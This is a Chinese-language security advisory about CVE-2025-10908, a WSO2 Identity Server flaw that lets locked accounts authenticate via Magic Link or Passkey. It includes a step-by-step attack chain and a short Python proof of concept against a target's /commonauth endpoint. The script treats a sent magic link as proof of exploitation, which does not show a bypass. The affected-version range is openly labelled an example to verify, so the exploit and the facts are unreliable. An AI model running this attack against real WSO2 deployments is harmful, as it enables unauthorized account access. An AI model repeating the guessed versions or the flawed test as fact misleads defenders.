CVE-2025-10908 WSO2认证绕过致锁定账户失效

漏洞信息

漏洞编号

CVE-2025-10908

漏洞类型

认证绕过

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WSO2 Identity Server

漏洞概述

CVE-2025-10908是一个高危漏洞。由于在身份验证过程中缺乏对用户账户状态的验证，攻击者可以通过Magic Link或Pass Key（通行密钥）方法成功认证已被锁定的用户账户。这绕过了本应阻止访问锁定账户的安全控制机制，可能导致未经授权访问应用程序及敏感数据，并破坏账户锁定机制的有效性。

技术细节

该漏洞源于身份验证逻辑中的设计缺陷。通常情况下，当用户账户因多次尝试失败被锁定时，系统应拒绝任何形式的登录尝试。然而，在受影响的WSO2产品中，使用Magic Link或Pass Key的无密码登录流程未正确检查账户的锁定状态。攻击者只需知道目标用户的电子邮件或拥有对应的Pass Key，即可发起认证请求。服务器在验证凭证时，仅校验了凭证的有效性，而忽略了账户当前处于“锁定”的状态标志。因此，即使用户账户已被安全策略锁定，攻击者仍能绕过限制，成功获取有效的会话令牌。

攻击链分析

STEP 1

1. 侦察

识别目标系统为WSO2产品，并获取目标用户的邮箱地址或注册的Pass Key信息。

STEP 2

2. 触发锁定（可选）

攻击者故意多次输错密码触发账户锁定机制，确认账户处于锁定状态。

STEP 3

3. 利用漏洞

攻击者向服务器发起Magic Link请求或Pass Key认证，利用服务器未校验锁定状态的缺陷。

STEP 4

4. 绕过验证

系统验证凭证有效性后，忽略了锁定标记，允许通过认证流程。

STEP 5

5. 获取访问

攻击者成功登录系统，获取被锁定账户的访问权限及敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Conceptual PoC for CVE-2025-10908 # Demonstrates authentication bypass for locked accounts via Magic Link import requests target = "https://target-wso2-instance.com/commonauth" locked_user = "[email protected]" # Payload simulating a Magic Link or Passkey login attempt payload = { "username": locked_user, "authType": "magic_link" # or 'passkey' } response = requests.post(target, data=payload) # If the server processes the authentication without checking lock status if response.status_code == 200 and ("magic_link_sent" in response.text or "auth_success" in response.text): print("[+] Exploit Successful: Authentication initiated for locked account.") else: print("[-] Exploit Failed: Account lock enforced.")

影响范围

WSO2 Identity Server 5.11.0 - 5.12.0 (Example range based on typical advisory, verify exact versions)

WSO2 IS as Key Manager 5.11.0 - 5.12.0

防御指南

临时缓解措施

建议立即审查WSO2官方安全公告WSO2-2025-4388并应用相应的补丁。在无法立即打补丁的情况下，建议临时禁用Magic Link和Pass Key登录方式，仅保留需要严格校验锁定状态的传统登录方式，同时加强对异常登录行为的监控。